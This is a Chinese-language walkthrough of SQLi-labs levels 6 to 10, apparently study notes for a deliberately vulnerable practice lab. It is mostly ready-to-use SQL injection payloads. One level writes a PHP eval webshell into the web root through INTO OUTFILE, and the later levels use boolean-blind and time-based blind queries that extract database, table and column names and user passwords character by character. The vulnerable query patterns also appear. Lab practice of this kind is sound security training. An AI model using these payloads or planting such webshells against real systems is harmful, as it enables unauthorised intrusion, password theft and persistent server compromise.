第六关(双注入GET双引号字符型注入)
核心代码:
1 $id = '"'.$id.'"'; 2 $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
跟第五关类似
第七关(导出文件GET字符型注入)
核心代码
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
不返回mysql错误
检测 secure_file_priv 是否为 NULL，为 NULL 则不能写入文件
SHOW VARIABLES LIKE "secure_file_priv";
secure_file_priv 的值为空字符串时才能写入（为 NULL 或指定了目录时都受限）
payload:
id=1')) and 1=1--+ id=1')) and 1=2--+ #写入一句话webshell id=1'))UNION SELECT 1,"<?php @eval($_POST['X']);?>",3 into outfile "C:\phpStudy\PHPTutorial\WWW\lou\sql\Less-7\muma.php"--+
参考学习:https://blog.csdn.net/Jiajiajiang_/article/details/86226884
第八关(布尔型单引号GET盲注)
payload:
1 判断数据库长度 2 ' and length(database())=8--+ 3 爆数据库名 4 ' and left((select database()),1)='s'--+ 5 判断数据库中表的数量 6 ' and if((select count(*) from information_schema.tables where table_schema=database())>1,sleep(5),1)--+ 7 ' and (select count(*) from information_schema.tables where table_schema=database())>1 --+ 8 爆表名 9 ' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+ 10 判断字段数量 11 ' and (select count(*) from information_schema.columns where table_name='users')>1--+ 12 爆字段名 13 ' and left((select column_name from information_schema.columns where table_name='users' limit 1,1),1)='f'--+ 14 爆数据 15 ' and left((select password from users limit 0,1),1)='D' --+
第九关(基于时间的GET单引号盲注)
payload:
1 ' and if(length(database())=8,sleep(3),1)--+ 2 ' and if(left(database(),1)='s',sleep(3),1)--+ 3 ' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(3),1)--+ 4 ' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(3),1)--+ 5 ' and if(left((select password from users limit 0,1),1)='D',sleep(3),1) --+
第十关(基于时间的双引号盲注)
payload:
1 " and if(length(database())=8,sleep(3),1)--+ 2 " and if(left(database(),1)='s',sleep(3),1)--+ 3 " and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(3),1)--+ 4 " and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(3),1)--+ 5 " and if(left((select password from users limit 0,1),1)='D',sleep(3),1)--+